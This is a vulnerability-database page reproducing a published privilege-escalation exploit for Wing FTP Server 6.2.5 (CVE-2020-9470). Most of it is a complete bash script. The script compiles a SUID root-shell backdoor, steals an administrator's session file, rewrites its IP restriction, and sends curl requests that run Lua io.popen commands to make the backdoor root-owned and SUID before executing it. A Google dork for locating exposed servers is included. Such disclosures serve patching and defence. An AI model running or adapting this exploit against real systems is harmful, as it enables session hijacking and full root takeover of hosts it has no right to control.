Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Wing FTP Server 6.2.5 Privilege Escalation

Related Vulnerabilities: CVE-2020-9470  
Publish Date: 02 Mar 2020
Author: Cary Hooper
Source 
                							

                # Exploit Title: Wing FTP Server 6.2.5 - Privilege Escalation
# Google Dork: intitle:"Wing FTP Server - Web"
# Date: 2020-03-03
# Exploit Author: Cary Hooper
# Vendor Homepage: https://www.wftpserver.com
# Software Link: https://www.wftpserver.com/download/wftpserver-linux-64bit.tar.gz
# Version: v6.2.5 and prior
# Tested on: Ubuntu 18.04
# CVE: N/A

# If $_WINGFTPDIR is the installation directory where Wing FTP was installed,
# $_WINGFTPDIR/wftpserver/session/* --> corresponds to user sessions... world readable/writeable (possibly exploitable)
# $_WINGFTPDIR/wftpserver/session_admin/* --> corresponds to admin sessions... world readable/writeable.
# We can wait for an admin to log in, steal their session, then launch a curl command which executes LUA.
# https://www.hooperlabs.xyz/disclosures/cve-2020-9470.php (writeup)



#!/bin/bash

echo 'Local root privilege escalation for Wing FTP Server (v.6.2.5)'
echo 'Exploit by Cary Hooper (@nopantrootdance)'

function writeBackdoor() {
  #this function creates a backdoor program (executes bash)
  echo "    Writing backdoor in $1"
  echo '#include <stdio.h>' > $1/foobarh00p.c
  echo '#include <sys/types.h>' >> $1/foobarh00p.c
  echo '#include <unistd.h>' >> $1/foobarh00p.c
  echo 'int main(void){setuid(0); setgid(0); system("/bin/bash");}' >> $1/foobarh00p.c
  gcc -w $1/foobarh00p.c -o $1/foobarh00p
}

function makeRequest() {
  #Executes Lua command in admin panel to set the suid bit/chown on our backdoor
  #Change owner to root
  curl -i -k -b "UIDADMIN=$1" --data "command=io.popen('chown%20root%20$2%2Ffoobarh00p')" 'http://127.0.0.1:5466/admin_lua_script.html?r=0.08732964480139693' -H "Referer: http://127.0.0.1:5466/admin_lua_term.html"  >/dev/null 2>/dev/null
  #Make SUID
  curl -i -k -b "UIDADMIN=$1" --data "command=io.popen('chmod%204777%20$2%2Ffoobarh00p')" 'http://127.0.0.1:5466/admin_lua_script.html?r=0.08732964480139693' -H "Referer: http://127.0.0.1:5466/admin_lua_term.html"  >/dev/null 2>/dev/null
}

directories=( "/tmp" "/var/tmp" "/dev/shm" )
for dir in "${directories[@]}"
do
  #Check if directories are writeable
  if [ -w $dir ]
  then 
    echo "[!] Writeable directory found: $dir"
    export backdoordir=$dir
    break
  else 
    echo "    $dir is not writeable..."; fi
done

writeBackdoor $backdoordir

#Look for directory where administrative sessions are handled ($_WINGFTPDIR/session_admin/).
echo "    Finding the wftpserver directory"
export sessiondir=$(find / -name session_admin -type d 2>/dev/null | grep --color=never wftpserver)
if [ -z "$sessiondir" ]; then echo "Wing FTP directory not found.  Consider looking manually."; exit 1; fi
#Note: if no directory is found, look manually for the "wftpserver" directory, or a "wftpserver" binary.  Change the variable below and comment out the code above.  
#export sessiondir="/opt/wftpserver/session_admin"

#While loop to wait for an admin session to be established.  
echo "    Waiting for a Wing FTP admin to log in.  This may take a while..."
count=0
while : ; do
  if [ "$(ls -A $sessiondir)" ]; then
    #If a session file exists, the UID_ADMIN cookie is the name of the file.
    echo "[!] An administrator logged in... stealing their session."
    export cookie=$(ls -A $sessiondir | cut -d '.' -f1)
    export ip=$(cat $sessiondir/$cookie.lua | grep ipaddress| cut -d '[' -f4 | cut -d ']' -f1)
    echo "    Changing IP restrictions on the cookie..."
    cat $sessiondir/$cookie.lua | sed "s/$ip/127.0.0.1/g" > $backdoordir/$cookie.lua
    cp $backdoordir/$cookie.lua $sessiondir/$cookie.lua
    rm $backdoordir/$cookie.lua
    echo "[!] Successfully stole session."
    #Once found, make the malicious curl request
    export urldir=$(sed "s/\//\%2F/g" <<<$backdoordir)
    echo "    Making evil request as Wing FTP admin... (backdoor in ${backdoordir})"
    makeRequest $cookie $urldir
    break
  else
    #Checks every 10 seconds.  Outputs date to terminal for user feedback purposes only.
    sleep 10
    let "count+=1"
    if [ $count -eq 10 ]; then date; fi
    echo "..."
  fi
done

#Check if backdoor was created correctly
if [ $(stat -c "%a" $backdoordir/foobarh00p) != "4777" ]; then echo "    Something went wrong.  Backdoor is not SUID"; exit 1; fi
if [ $(stat -c "%U" $backdoordir/foobarh00p) != "root" ]; then echo "    Something went wrong.  Backdoor is not owned by root"; exit 1; fi

echo "    Backdoor is now SUID owned by root."
echo "[!] Executing backdoor. Cross your fingers..."
#Execute the backdoor... root!
$backdoordir/foobarh00p
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started